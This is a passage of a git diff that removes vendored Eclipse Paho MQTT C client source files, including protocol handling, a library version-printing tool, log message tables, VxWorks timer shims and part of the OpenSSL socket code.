-	rc = MQTTPacket_send_unsubscribe(topics, msgID, 0, &client->net, client->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming unsuback packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handleUnsubacks(void* pack, int sock)
-{
-	Unsuback* unsuback = (Unsuback*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 24, NULL, sock, client->clientID, unsuback->msgId);
-	free(unsuback);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.h b/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.h
deleted file mode 100644
index 3b890e7..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.h
+++ /dev/null
@@ -1,46 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - SNI support
- *******************************************************************************/
-
-#if !defined(MQTTPROTOCOLOUT_H)
-#define MQTTPROTOCOLOUT_H
-
-#include "LinkedList.h"
-#include "MQTTPacket.h"
-#include "Clients.h"
-#include "Log.h"
-#include "Messages.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolClient.h"
-
-#define DEFAULT_PORT 1883
-
-char* MQTTProtocol_addressPort(const char* uri, int* port);
-void MQTTProtocol_reconnect(const char* ip_address, Clients* client);
-#if defined(OPENSSL)
-int MQTTProtocol_connect(const char* ip_address, Clients* acClients, int ssl, int MQTTVersion);
-#else
-int MQTTProtocol_connect(const char* ip_address, Clients* acClients, int MQTTVersion);
-#endif
-int MQTTProtocol_handlePingresps(void* pack, int sock);
-int MQTTProtocol_subscribe(Clients* client, List* topics, List* qoss, int msgID);
-int MQTTProtocol_handleSubacks(void* pack, int sock);
-int MQTTProtocol_unsubscribe(Clients* client, List* topics, int msgID);
-int MQTTProtocol_handleUnsubacks(void* pack, int sock);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTVersion.c b/thirdparty/paho.mqtt.c/src/MQTTVersion.c
deleted file mode 100644
index 382033a..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTVersion.c
+++ /dev/null
@@ -1,230 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2015 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#include <stdio.h>
-
-#if !defined(_WRS_KERNEL)
-
-#include <stdlib.h>
-#include <string.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <sys/types.h>
-#include <ctype.h>
-#include "MQTTAsync.h"
-
-#if defined(WIN32) || defined(WIN64)
-#include <windows.h>
-#include <tchar.h>
-#include <io.h>
-#include <sys/stat.h>
-#else
-#include <dlfcn.h>
-#include <sys/mman.h>
-#include <unistd.h>
-#endif
-
-
-/**
- *
- * @file
- * \brief MQTTVersion - display the version and build information strings for a library.
- *
- * With no arguments, we try to load and call the version string for the libraries we 
- * know about: mqttv3c, mqttv3cs, mqttv3a, mqttv3as.
- * With an argument:
- *   1) we try to load the named library, call getVersionInfo and display those values. 
- *   2) If that doesn't work, we look through the binary for eyecatchers, and display those.  
- *      This will work if the library is not executable in the current environment.
- *
- * */
- 
- 
- static const char* libraries[] = {"paho-mqtt3c", "paho-mqtt3cs", "paho-mqtt3a", "paho-mqtt3as"};
- static const char* eyecatchers[] = {"MQTTAsyncV3_Version", "MQTTAsyncV3_Timestamp",
- 					 "MQTTClientV3_Version", "MQTTClientV3_Timestamp"};
- 
-
-char* FindString(char* filename, const char* eyecatcher_input);
-int printVersionInfo(MQTTAsync_nameValue* info);
-int loadandcall(char* libname);
-void printEyecatchers(char* filename);
-
-
-/**
- * Finds an eyecatcher in a binary file and returns the following value.
- * @param filename the name of the file
- * @param eyecatcher_input the eyecatcher string to look for
- * @return the value found - "" if not found 
- */
-char* FindString(char* filename, const char* eyecatcher_input)
-{
-	FILE* infile = NULL;
-	static char value[100];
-	const char* eyecatcher = eyecatcher_input;
-	
-	memset(value, 0, 100);
-	if ((infile = fopen(filename, "rb")) != NULL)
-	{
-		size_t buflen = strlen(eyecatcher);
-		char* buffer = (char*) malloc(buflen);
-
-		if (buffer != NULL)
-		{
-			int c = fgetc(infile);
-
-			while (feof(infile) == 0)
-			{
-				int count = 0;
-				buffer[count++] = c;
-				if (memcmp(eyecatcher, buffer, buflen) == 0)
-				{
-					char* ptr = value;
-					c = fgetc(infile); /* skip space */
-					c = fgetc(infile);
-					while (isprint(c))
-					{
-						*ptr++ = c;
-						c = fgetc(infile);
-					}
-					break;
-				}
-				if (count == buflen)
-				{
-					memmove(buffer, &buffer[1], buflen - 1);
-					count--;
-				}
-				c = fgetc(infile);
-			}
-			free(buffer);
-		}
-
-		fclose(infile);
-	}
-	return value;
-}
-
-
-int printVersionInfo(MQTTAsync_nameValue* info)
-{
-	int rc = 0;
-	
-	while (info->name)
-	{
-		printf("%s: %s\n", info->name, info->value);
-		info++;
-		rc = 1;  /* at least one value printed */
-	}
-	return rc;
-}
-
-typedef MQTTAsync_nameValue* (*func_type)(void);
-
-int loadandcall(char* libname)
-{
-	int rc = 0;
-	MQTTAsync_nameValue* (*func_address)(void) = NULL;
-#if defined(WIN32) || defined(WIN64)
-	wchar_t wlibname[30];
-	HMODULE APILibrary;
-
-	mbstowcs(wlibname, libname, strlen(libname) + 1);
-	if ((APILibrary = LoadLibrary(wlibname)) == NULL)
-		printf("Error loading library %s, error code %d\n", libname, GetLastError());
-	else
-	{
-		func_address = (func_type)GetProcAddress(APILibrary, "MQTTAsync_getVersionInfo");
-		if (func_address == NULL) 
-			func_address = (func_type)GetProcAddress(APILibrary, "MQTTClient_getVersionInfo");
-		if (func_address)
-			rc = printVersionInfo((*func_address)());
-		FreeLibrary(APILibrary);
-	}
-#else
-	void* APILibrary = dlopen(libname, RTLD_LAZY); /* Open the Library in question */
-	char* ErrorOutput = dlerror(); 	               /* Check it opened properly */
-	if (ErrorOutput != NULL)
-		printf("Error loading library %s, error %s\n", libname, ErrorOutput);
-	else
-	{	
-		*(void **) (&func_address) = dlsym(APILibrary, "MQTTAsync_getVersionInfo");
-		if (func_address == NULL)
-			func_address = dlsym(APILibrary, "MQTTClient_getVersionInfo");
-		if (func_address)
-			rc = printVersionInfo((*func_address)());
-		dlclose(APILibrary);
-	}
-#endif
-	return rc;
-}
- 
-	
-#if !defined(ARRAY_SIZE)
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-#endif
-
-void printEyecatchers(char* filename)
-{
-	int i = 0;
-	
-	for (i = 0; i < ARRAY_SIZE(eyecatchers); ++i)
-	{
-		char* value = FindString(filename, eyecatchers[i]);
-		if (value[0]) 
-			printf("%s: %s\n", eyecatchers[i], value);
-	}
-}
-
-
-int main(int argc, char** argv)
-{
-	printf("MQTTVersion: print the version strings of an MQTT client library\n"); 
-	printf("Copyright (c) 2012, 2015 IBM Corp.\n");
-	
-	if (argc == 1)
-	{
-		int i = 0;
-		char namebuf[60];
-		
-		printf("Specify a particular library name if it is not in the current directory, or not executable on this platform\n");
-		 
-		for (i = 0; i < ARRAY_SIZE(libraries); ++i)
-		{
-#if defined(WIN32) || defined(WIN64)
-			sprintf(namebuf, "%s.dll", libraries[i]);
-#else
-			sprintf(namebuf, "lib%s.so.1", libraries[i]);
-#endif
-			printf("--- Trying library %s ---\n", libraries[i]);
-			if (!loadandcall(namebuf))
-				printEyecatchers(namebuf);
-		}
-	}
-	else
-	{
-		if (!loadandcall(argv[1]))
-			printEyecatchers(argv[1]);
-	}
-
-	return 0;
-}
-#else
-int main(void)
-{
-    fprintf(stderr, "This tool is not supported on this platform yet.\n");
-    return 1;
-}
-#endif /* !defined(_WRS_KERNEL) */
diff --git a/thirdparty/paho.mqtt.c/src/Messages.c b/thirdparty/paho.mqtt.c/src/Messages.c
deleted file mode 100644
index 63bd193..0000000
--- a/thirdparty/paho.mqtt.c/src/Messages.c
+++ /dev/null
@@ -1,104 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-/**
- * @file
- * \brief Trace messages
- *
- */
-
-
-#include "Messages.h"
-#include "Log.h"
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include "Heap.h"
-
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-
-#define max_msg_len 120
-
-static const char *protocol_message_list[] =
-{
-	"%d %s -> CONNECT cleansession: %d (%d)", /* 0, was 131, 68 and 69 */
-	"%d %s <- CONNACK rc: %d", /* 1, was 132 */
-	"%d %s -> CONNACK rc: %d (%d)", /* 2, was 138 */
-	"%d %s <- PINGREQ", /* 3, was 35 */
-	"%d %s -> PINGRESP (%d)", /* 4 */
-	"%d %s <- DISCONNECT", /* 5 */
-	"%d %s <- SUBSCRIBE msgid: %d", /* 6, was 39 */
-	"%d %s -> SUBACK msgid: %d (%d)", /* 7, was 40 */
-	"%d %s <- UNSUBSCRIBE msgid: %d", /* 8, was 41 */
-	"%d %s -> UNSUBACK msgid: %d (%d)", /* 9 */
-	"%d %s -> PUBLISH msgid: %d qos: %d retained: %d (%d) payload: %.*s", /* 10, was 42 */
-	"%d %s <- PUBLISH msgid: %d qos: %d retained: %d payload: %.*s", /* 11, was 46 */
-	"%d %s -> PUBACK msgid: %d (%d)", /* 12, was 47 */
-	"%d %s -> PUBREC msgid: %d (%d)", /* 13, was 48 */
-	"%d %s <- PUBACK msgid: %d", /* 14, was 49 */
-	"%d %s <- PUBREC msgid: %d", /* 15, was 53 */
-	"%d %s -> PUBREL msgid: %d (%d)", /* 16, was 57 */
-	"%d %s <- PUBREL msgid %d", /* 17, was 58 */
-	"%d %s -> PUBCOMP msgid %d (%d)", /* 18, was 62 */
-	"%d %s <- PUBCOMP msgid:%d", /* 19, was 63 */
-	"%d %s -> PINGREQ (%d)", /* 20, was 137 */
-	"%d %s <- PINGRESP", /* 21, was 70 */
-	"%d %s -> SUBSCRIBE msgid: %d (%d)", /* 22, was 72 */
-	"%d %s <- SUBACK msgid: %d", /* 23, was 73 */
-	"%d %s <- UNSUBACK msgid: %d", /* 24, was 74 */
-	"%d %s -> UNSUBSCRIBE msgid: %d (%d)", /* 25, was 106 */
-	"%d %s <- CONNECT", /* 26 */
-	"%d %s -> PUBLISH qos: 0 retained: %d (%d)", /* 27 */
-	"%d %s -> DISCONNECT (%d)", /* 28 */
-	"Socket error for client identifier %s, socket %d, peer address %s; ending connection", /* 29 */
-};
-
-static const char *trace_message_list[] =
-{
-	"Failed to remove client from bstate->clients", /* 0 */
-	"Removed client %s from bstate->clients, socket %d", /* 1 */
-	"Packet_Factory: unhandled packet type %d", /* 2 */
-	"Packet %s received from client %s for message identifier %d, but no record of that message identifier found", /* 3 */
-	"Packet %s received from client %s for message identifier %d, but message is wrong QoS, %d", /* 4 */
-	"Packet %s received from client %s for message identifier %d, but message is in wrong state", /* 5 */
-	"%s received from client %s for message id %d - removing publication", /* 6 */
-	"Trying %s again for client %s, socket %d, message identifier %d", /* 7 */
-	"", /* 8 */
-	"(%lu) %*s(%d)> %s:%d", /* 9 */
-	"(%lu) %*s(%d)< %s:%d", /* 10 */
-	"(%lu) %*s(%d)< %s:%d (%d)", /* 11 */
-	"Storing unsent QoS 0 message", /* 12 */
-};
-
-/**
- * Get a log message by its index
- * @param index the integer index
- * @param log_level the log level, used to determine which message list to use
- * @return the message format string
- */
-const char* Messages_get(int index, enum LOG_LEVELS log_level)
-{
-	const char *msg = NULL;
-
-	if (log_level == TRACE_PROTOCOL)
-		msg = (index >= 0 && index < ARRAY_SIZE(protocol_message_list)) ? protocol_message_list[index] : NULL;
-	else
-		msg = (index >= 0 && index < ARRAY_SIZE(trace_message_list)) ? trace_message_list[index] : NULL;
-	return msg;
-}
-
diff --git a/thirdparty/paho.mqtt.c/src/Messages.h b/thirdparty/paho.mqtt.c/src/Messages.h
deleted file mode 100644
index 08f292f..0000000
--- a/thirdparty/paho.mqtt.c/src/Messages.h
+++ /dev/null
@@ -1,24 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#if !defined(MESSAGES_H)
-#define MESSAGES_H
-
-#include "Log.h"
-
-const char* Messages_get(int, enum LOG_LEVELS);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/OsWrapper.c b/thirdparty/paho.mqtt.c/src/OsWrapper.c
deleted file mode 100644
index 6d2f97c..0000000
--- a/thirdparty/paho.mqtt.c/src/OsWrapper.c
+++ /dev/null
@@ -1,28 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2016, 2017 logi.cals GmbH
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Gunter Raidl - timer support for VxWorks
- *    Rainer Poisel - reusability
- *******************************************************************************/
-
-#include "OsWrapper.h"
-
-#if defined(_WRS_KERNEL)
-void usleep(useconds_t useconds)
-{
-	struct timespec tv;
-	tv.tv_sec = useconds / 1000000;
-	tv.tv_nsec = (useconds % 1000000) * 1000;
-	nanosleep(&tv, NULL);
-}
-#endif /* defined(_WRS_KERNEL) */
diff --git a/thirdparty/paho.mqtt.c/src/OsWrapper.h b/thirdparty/paho.mqtt.c/src/OsWrapper.h
deleted file mode 100644
index f657ab1..0000000
--- a/thirdparty/paho.mqtt.c/src/OsWrapper.h
+++ /dev/null
@@ -1,42 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2016, 2017 logi.cals GmbH
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Gunter Raidl - timer support for VxWorks
- *    Rainer Poisel - reusability
- *******************************************************************************/
-
-#if !defined(OSWRAPPER_H)
-#define OSWRAPPER_H
-
-#if defined(_WRS_KERNEL)
-#include <time.h>
-
-#define lstat stat
-
-typedef unsigned long useconds_t;
-void usleep(useconds_t useconds);
-
-#define timersub(a, b, result) \
-	do \
-	{ \
-		(result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \
-		(result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \
-		if ((result)->tv_usec < 0) \
-		{ \
-			--(result)->tv_sec; \
-			(result)->tv_usec += 1000000L; \
-		} \
-	} while (0)
-#endif /* defined(_WRS_KERNEL) */
-
-#endif /* OSWRAPPER_H */
diff --git a/thirdparty/paho.mqtt.c/src/SSLSocket.c b/thirdparty/paho.mqtt.c/src/SSLSocket.c
deleted file mode 100644
index d17c8bc..0000000
--- a/thirdparty/paho.mqtt.c/src/SSLSocket.c
+++ /dev/null
@@ -1,917 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs, Allan Stockdill-Mander - initial implementation
- *    Ian Craggs - fix for bug #409702
- *    Ian Craggs - allow compilation for OpenSSL < 1.0
- *    Ian Craggs - fix for bug #453883
- *    Ian Craggs - fix for bug #480363, issue 13
- *    Ian Craggs - SNI support
- *    Ian Craggs - fix for issues #155, #160
- *******************************************************************************/
-
-/**
- * @file
- * \brief SSL  related functions
- *
- */
-
-#if defined(OPENSSL)
-
-#include "SocketBuffer.h"
-#include "MQTTClient.h"
-#include "SSLSocket.h"
-#include "Log.h"
-#include "StackTrace.h"
-#include "Socket.h"
-
-#include "Heap.h"
-
-#include <openssl/ssl.h>
-#include <openssl/err.h>
-#include <openssl/crypto.h>
-
-extern Sockets s;
-
-int SSLSocket_error(char* aString, SSL* ssl, int sock, int rc);
-char* SSL_get_verify_result_string(int rc);
-void SSL_CTX_info_callback(const SSL* ssl, int where, int ret);
-char* SSLSocket_get_version_string(int version);
-void SSL_CTX_msg_callback(
-		int write_p,
-		int version,
-		int content_type,
-		const void* buf, size_t len,
-		SSL* ssl, void* arg);
-int pem_passwd_cb(char* buf, int size, int rwflag, void* userdata);
-int SSL_create_mutex(ssl_mutex_type* mutex);
-int SSL_lock_mutex(ssl_mutex_type* mutex);
-int SSL_unlock_mutex(ssl_mutex_type* mutex);
-void SSL_destroy_mutex(ssl_mutex_type* mutex);
-#if (OPENSSL_VERSION_NUMBER >= 0x010000000)
-extern void SSLThread_id(CRYPTO_THREADID *id);
-#else
-extern unsigned long SSLThread_id(void);
-#endif
-extern void SSLLocks_callback(int mode, int n, const char *file, int line);
-int SSLSocket_createContext(networkHandles* net, MQTTClient_SSLOptions* opts);
-void SSLSocket_destroyContext(networkHandles* net);
-void SSLSocket_addPendingRead(int sock);
-
-/* 1 ~ we are responsible for initializing openssl; 0 ~ openssl init is done externally */
-static int handle_openssl_init = 1;
-static ssl_mutex_type* sslLocks = NULL;
-static ssl_mutex_type sslCoreMutex;
-
-#if defined(WIN32) || defined(WIN64)
-#define iov_len len
-#define iov_base buf
-#endif
-
-/**
- * Gets the specific error corresponding to SOCKET_ERROR
- * @param aString the function that was being used when the error occurred
- * @param sock the socket on which the error occurred
- * @return the specific TCP error code
- */
-int SSLSocket_error(char* aString, SSL* ssl, int sock, int rc)
-{
-    int error;
-
-    FUNC_ENTRY;
-    if (ssl)
-        error = SSL_get_error(ssl, rc);
-    else
-        error = ERR_get_error();
-    if (error == SSL_ERROR_WANT_READ || error == SSL_ERROR_WANT_WRITE)
-    {
-		Log(TRACE_MIN, -1, "SSLSocket error WANT_READ/WANT_WRITE");
-    }
-    else
-    {
-        static char buf[120];
-
-        if (strcmp(aString, "shutdown") != 0)
-        	Log(TRACE_MIN, -1, "SSLSocket error %s(%d) in %s for socket %d rc %d errno %d %s\n", buf, error, aString, sock, rc, errno, strerror(errno));
-         ERR_print_errors_fp(stderr);
-		if (error == SSL_ERROR_SSL || error == SSL_ERROR_SYSCALL)
-			error = SSL_FATAL;
-    }
-    FUNC_EXIT_RC(error);
-    return error;
-}
-
-static struct
-{
-	int code;
-	char* string;
-}
-X509_message_table[] =
-{
-	{ X509_V_OK, "X509_V_OK" },
-	{ X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT, "X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT" },
-	{ X509_V_ERR_UNABLE_TO_GET_CRL, "X509_V_ERR_UNABLE_TO_GET_CRL" },
-	{ X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE, "X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE" },
-	{ X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE, "X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE" },
-	{ X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY, "X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY" },
-	{ X509_V_ERR_CERT_SIGNATURE_FAILURE, "X509_V_ERR_CERT_SIGNATURE_FAILURE" },
-	{ X509_V_ERR_CRL_SIGNATURE_FAILURE, "X509_V_ERR_CRL_SIGNATURE_FAILURE" },
-	{ X509_V_ERR_CERT_NOT_YET_VALID, "X509_V_ERR_CERT_NOT_YET_VALID" },
-	{ X509_V_ERR_CERT_HAS_EXPIRED, "X509_V_ERR_CERT_HAS_EXPIRED" },
-	{ X509_V_ERR_CRL_NOT_YET_VALID, "X509_V_ERR_CRL_NOT_YET_VALID" },
-	{ X509_V_ERR_CRL_HAS_EXPIRED, "X509_V_ERR_CRL_HAS_EXPIRED" },
-	{ X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD, "X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD" },
-	{ X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD, "X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD" },
-	{ X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD, "X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD" },
-	{ X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD, "X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD" },
-	{ X509_V_ERR_OUT_OF_MEM, "X509_V_ERR_OUT_OF_MEM" },
-	{ X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT, "X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT" },
-	{ X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN, "X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN" },
-	{ X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY, "X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY" },
-	{ X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE, "X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE" },
-	{ X509_V_ERR_CERT_CHAIN_TOO_LONG, "X509_V_ERR_CERT_CHAIN_TOO_LONG" },
-	{ X509_V_ERR_CERT_REVOKED, "X509_V_ERR_CERT_REVOKED" },
-	{ X509_V_ERR_INVALID_CA, "X509_V_ERR_INVALID_CA" },
-	{ X509_V_ERR_PATH_LENGTH_EXCEEDED, "X509_V_ERR_PATH_LENGTH_EXCEEDED" },
-	{ X509_V_ERR_INVALID_PURPOSE, "X509_V_ERR_INVALID_PURPOSE" },
-	{ X509_V_ERR_CERT_UNTRUSTED, "X509_V_ERR_CERT_UNTRUSTED" },
-	{ X509_V_ERR_CERT_REJECTED, "X509_V_ERR_CERT_REJECTED" },
-	{ X509_V_ERR_SUBJECT_ISSUER_MISMATCH, "X509_V_ERR_SUBJECT_ISSUER_MISMATCH" },
-	{ X509_V_ERR_AKID_SKID_MISMATCH, "X509_V_ERR_AKID_SKID_MISMATCH" },
-	{ X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH, "X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH" },
-	{ X509_V_ERR_KEYUSAGE_NO_CERTSIGN, "X509_V_ERR_KEYUSAGE_NO_CERTSIGN" },
-	{ X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER, "X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER" },
-	{ X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION, "X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION" },
-	{ X509_V_ERR_KEYUSAGE_NO_CRL_SIGN, "X509_V_ERR_KEYUSAGE_NO_CRL_SIGN" },
-	{ X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION, "X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION" },
-	{ X509_V_ERR_INVALID_NON_CA, "X509_V_ERR_INVALID_NON_CA" },
-	{ X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED, "X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED" },
-	{ X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE, "X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE" },
-	{ X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED, "X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED" },
-	{ X509_V_ERR_INVALID_EXTENSION, "X509_V_ERR_INVALID_EXTENSION" },
-	{ X509_V_ERR_INVALID_POLICY_EXTENSION, "X509_V_ERR_INVALID_POLICY_EXTENSION" },
-	{ X509_V_ERR_NO_EXPLICIT_POLICY, "X509_V_ERR_NO_EXPLICIT_POLICY" },
-	{ X509_V_ERR_UNNESTED_RESOURCE, "X509_V_ERR_UNNESTED_RESOURCE" },
-#if defined(X509_V_ERR_DIFFERENT_CRL_SCOPE)
-	{ X509_V_ERR_DIFFERENT_CRL_SCOPE, "X509_V_ERR_DIFFERENT_CRL_SCOPE" },
-	{ X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE, "X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE" },
-	{ X509_V_ERR_PERMITTED_VIOLATION, "X509_V_ERR_PERMITTED_VIOLATION" },
-	{ X509_V_ERR_EXCLUDED_VIOLATION, "X509_V_ERR_EXCLUDED_VIOLATION" },
-	{ X509_V_ERR_SUBTREE_MINMAX, "X509_V_ERR_SUBTREE_MINMAX" },
-	{ X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE, "X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE" },
-	{ X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX, "X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX" },
-	{ X509_V_ERR_UNSUPPORTED_NAME_SYNTAX, "X509_V_ERR_UNSUPPORTED_NAME_SYNTAX" },
-#endif
-};
-
-#if !defined(ARRAY_SIZE)
-/**
- * Macro to calculate the number of entries in an array
- */
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-#endif
-
-char* SSL_get_verify_result_string(int rc)
-{
-	int i;
-	char* retstring = "undef";
-
-	for (i = 0; i < ARRAY_SIZE(X509_message_table); ++i)
-	{
-		if (X509_message_table[i].code == rc)
-		{
-			retstring = X509_message_table[i].string;
-			break;
-		}
-	}
-	return retstring;
-}
-
-
-void SSL_CTX_info_callback(const SSL* ssl, int where, int ret)
-{
-	if (where & SSL_CB_LOOP)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL state %s:%s:%s", 
-                  (where & SSL_ST_CONNECT) ? "connect" : (where & SSL_ST_ACCEPT) ? "accept" : "undef", 
-                    SSL_state_string_long(ssl), SSL_get_cipher_name(ssl));
-	}
-	else if (where & SSL_CB_EXIT)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL %s:%s",
-                  (where & SSL_ST_CONNECT) ? "connect" : (where & SSL_ST_ACCEPT) ? "accept" : "undef",
-                    SSL_state_string_long(ssl));
-	}
-	else if (where & SSL_CB_ALERT)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL alert %s:%s:%s",
-                  (where & SSL_CB_READ) ? "read" : "write", 
-                    SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-	}
-	else if (where & SSL_CB_HANDSHAKE_START)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL handshake started %s:%s:%s",
-                  (where & SSL_CB_READ) ? "read" : "write", 
-                    SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-	}
-	else if (where & SSL_CB_HANDSHAKE_DONE)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL handshake done %s:%s:%s", 
-                  (where & SSL_CB_READ) ? "read" : "write",
-                    SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-		Log(TRACE_PROTOCOL, 1, "SSL certificate verification: %s", 
-                    SSL_get_verify_result_string(SSL_get_verify_result(ssl)));
-	}
-	else
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL state %s:%s:%s", SSL_state_string_long(ssl), 
-                   SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-	}
-}
-
-
-char* SSLSocket_get_version_string(int version)
-{
-	int i;
-	static char buf[20];
-	char* retstring = NULL;
-	static struct
-	{
-		int code;
-		char* string;
-	}
-	version_string_table[] =
-	{
-		{ SSL2_VERSION, "SSL 2.0" },
